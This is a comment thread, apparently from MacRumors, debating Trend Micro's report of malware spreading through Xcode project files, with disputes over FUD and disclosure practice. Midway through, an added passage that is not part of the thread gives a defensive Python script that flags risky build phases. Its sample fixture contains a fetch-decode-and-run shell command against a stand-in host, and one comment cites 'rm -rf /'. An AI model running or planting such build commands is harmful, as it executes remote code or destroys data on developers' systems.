This whole thing is super fishy. From Trend Micro's technical brief:


This is really the definition of FUD, no?

So out of the millions of users on GitHub and trillions of lines of code, Trend Micro found just 2 repos with Mac malware?

No self-respecting developer is going to ever use these two repos in the first place. Developers use projects with good documentation that serve an actual need.

Occam's razor more likely says they found malware authors posting to GitHub. A conspiracy theorist might even say they perhaps planted it themselves.

And why are these repos even still active? Malware is against GH's TOS. If Trend Micro actually cared, they'd report these repos as nefarious. Otherwise they have little proof as reporting anything.

And on the linked page:


Alerting users to security threats is one thing. Hawking your products at the exact same time is a little desperate IMO.
When did the world get so paranoid as to see conspiracies absolutely everywhere?

If Trend Micro had said “we found a very very bad malware that we can‘t disclose and it affects applications you would never have suspected but if you buy our product you’ll be protected”, then that would be FUD.

FUD is fear, uncertainty and doubt. I don’t see any of those here. I see a company that specializes in malware reporting a finding. By telling you they found it in 2 repos, they are reducing both the fear and the uncertainty.

Trend is doing us a service by reporting the threat. You can decide how big of a threat it is to you and how you want to respond to it. To me, this proves a concept. Sure it may not be widespread, but it doesn’t do us much good if Trend waits until we’re all infected to tell us about it.

As far as hawking their products, I’m not sure what the problem is. Those products pay for their ability to find these things. And there are plenty of bad actors in the world creating malware, Trend doesn’t need to leak the disease so they can sell the cure like some Bond supervillain.

Ironically, it’s your post that more closely hews to the definition of FUD. Fear of the corporation, uncertainty of whether we can trust what’s really happening, doubting the legitimacy of the reports.
 
Why in this article and all of the comments up to here is there no description of how to detect the malware, or which repos are poisoned?

Have we lost the journalists here at MacRumors? Or did I miss something.

You are so right!
We need to know how to detect it: please, whoever knows, share it!
 
Unfortunately there's plenty of nuts out there, some of them might be justified, others not so much.

It sounds like you might be new to infosec so let me help you out. Apple and other corporations have bug bounty programs exactly for this very reason, so researchers can get paid for their discoveries. You're making it seem like Trend is doing the world a favor here.

Trend Micro is also claiming there's two 0-day vulnerabilities in Apple's Data Vault and Safari that this malware is exploiting. That's the real meat here but with very little substance. Apple has Gatekeeper built into modern OS versions to easily kill these sorts of malware based on their signatures.

FWIW consumers are terrible at making good decisions. Most people don't even update their software regularly and you want them to decide how big of a security threat something is? Have you actually worked in corporate IT?

I'm not against the discovery of new threats and I also have zero problem with them making money. What I am against is how they disclosed it. If Trend would have said "we've also let Apple know about our findings so they can update gatekeeper, etc but in the meantime, here's our software to help..." yeh, I can get behind that. It's not the way proper infosec disclosure is done.

Some of these "0days" these days are getting air time when they're not even bugs at all. Security companies love to build up hype for themselves.
 
Sadly, you might be right here. This is all headlines meant for emotional impact and no substance whatsoever. I mark this as BS and my trust in Trend Micro is down, down, down.
 
I'm not 100% certain from the article wording if the project has to be built, or built and run.
The article says, “when the project is built, the malicious code is run”. I take this to mean there’s some facility in the file(s) which describe to the system how to build the project (old school this would be a Makefile, these days Xcode has some sort of equivalent file to specify dependencies and such)... the implication is that this facility allows specifying arbitrary shell commands, to run during the build process. If this is the case, one could easily damage a system by specifying a “do this before building” command like, “rm -rf /”. Or one could construct a more complicated command to do something even more nefarious. I don’t know if this is what’s going on, but the article does indicate that merely building the project sets the malware in action.
 
FWIW, the same concept can also be used to infect other development tools.

Build tools are getting more complicated. More often than not, makefiles contain executable code (i.e. your garden-variety "./configure.sh" is executable code). These can contain or download malware and embed it into whatever software the tool is building.
./configure.sh is a plain text bash file. The only way it can spread a virus is when incompetent software maintainers didn't look at it or know what it does.
As far as I understand the vulnerability (the link didn't explain it very well), the virus comes from a plain text script in the GitHub repository, which is used by Xcode when building an app. So, some developer pushed it to some GitHub repository, and maintainers for that repository didn't catch it. You are not gonna see malware in carefully maintained and trusted GitHub repositories.
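The two posts above describe the mechanism in general terms (a build file that can carry arbitrary shell commands, which Xcode runs when the project is built). As an added example that is not from the thread, Trend Micro or any real project, here is a small Python audit script that pulls every Run Script build phase out of an Xcode project.pbxproj and flags the ones that fetch or execute remote code, which is the kind of check a reviewer can run before building an unfamiliar project. The sample pbxproj fragment and the watch-list of commands are constructed assumptions.

```python
import re

# Constructed sample project.pbxproj fragment (an assumption, not from the page or
# any real repository): one ordinary lint phase and one phase that fetches and
# executes remote code every time the project is built.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "swiftlint lint --quiet\n";
        };
        D4E5F6 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "curl -s https://example.invalid/x | base64 -d | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# One pbxproj object: "<hex id> /* name */ = { ... };"
OBJECT_RE = re.compile(
    r'(?P<id>[0-9A-F]+)\s*/\*\s*(?P<name>[^*]*?)\s*\*/\s*=\s*\{(?P<body>.*?)\n\s*\};',
    re.S)
# The script body is a double-quoted string using backslash escapes.
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:\\.|[^"\\])*)"', re.S)
# Constructed watch-list: commands a reviewer should inspect before building.
SUSPICIOUS = ("curl ", "wget ", "base64", "eval ", "osascript",
              "| sh", "| bash", "nohup", "chmod +x")

def extract_build_scripts(pbxproj: str) -> list:
    """Return (id, phase name, script) for every PBXShellScriptBuildPhase object."""
    found = []
    for m in OBJECT_RE.finditer(pbxproj):
        if "isa = PBXShellScriptBuildPhase;" not in m.group("body"):
            continue  # sources, frameworks and other phases carry no shell script
        s = SCRIPT_RE.search(m.group("body"))
        script = s.group(1).replace('\\"', '"').replace("\\n", "\n") if s else ""
        found.append((m.group("id"), m.group("name"), script))
    return found

def flag_scripts(pbxproj: str) -> list:
    """Return (id, [matched patterns]) for each run-script phase that needs review."""
    flagged = []
    for pid, _name, script in extract_build_scripts(pbxproj):
        hits = [p for p in SUSPICIOUS if p in script]
        if hits:
            flagged.append((pid, hits))
    return flagged
```

On a real checkout, `flag_scripts(open("MyApp.xcodeproj/project.pbxproj").read())` lists the phases to read by hand before the first build.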
 
So is this fishy, is it FUD, or is it the fact that they didn't headline that they contacted Apple? Trend didn't put this in front of consumers, MR did. It seems like the fact that there is bad code lurking in Xcode project files and it already exists in the wild is something developers should know.

You tell Apple when you find something first, before it's in the wild. That's what the bug bounty program is for. If it's already in the wild, you tell people to take precautions. That's what this press release did.

Since you seem to have studied this with an expert infosec eye, can you point out what, exactly, Gatekeeper is going to kill? I just did a quick read of the details, so I may have missed the chokepoint, but this looks to me like a bunch of code compiled and run by the local user as part of their own Xcode build that replicates itself through all of that user's Xcode projects. Unless you're Vlad.
 
Do you think all open source projects are taken care of by competent software maintainers?

Most of these projects are handled on a voluntary, time-available basis in their spare time on top of some day job doing something else. Look up what happened during Heartbleed for a good example.

It only takes one line in a "plain text bash file" to download some library to include in the compiled project.
 
Please go back to the old cookie consent plugin. This one is so awful it isn’t even funny. It’s deliberately designed to infuriate visitors into clicking “allow all”. You can’t even scroll up properly on a touch device. There was nothing wrong with the old one - bring it back.
I can’t figure out what aspect of Mac Malware you’re talking about. If you’re referring to the MacRumors site itself, go post in the Site and Forum Feedback subforum - if you make such comments/requests in the middle of the comment section on unrelated stories, you’re pretty much guaranteed the site admins will never notice it.
 
It only takes one competent reviewer to find the faulty commit.

PS: I'm saying that maintainers have that responsibility. If they don't have expertise or time, archive the project or find someone else.
 
Sounds like an overblown risk to me. Sure, Apple should look into the attack vector, but ultimately code that is used in a project is either already well established in the industry, or closely vetted if it's actually needed. An obscure repo with little history would have to offer something really interesting to make it into a project.

Sounds a lot like snake oil salesmen to me.
 
You've probably never heard of VLC distributing malware at one time.
 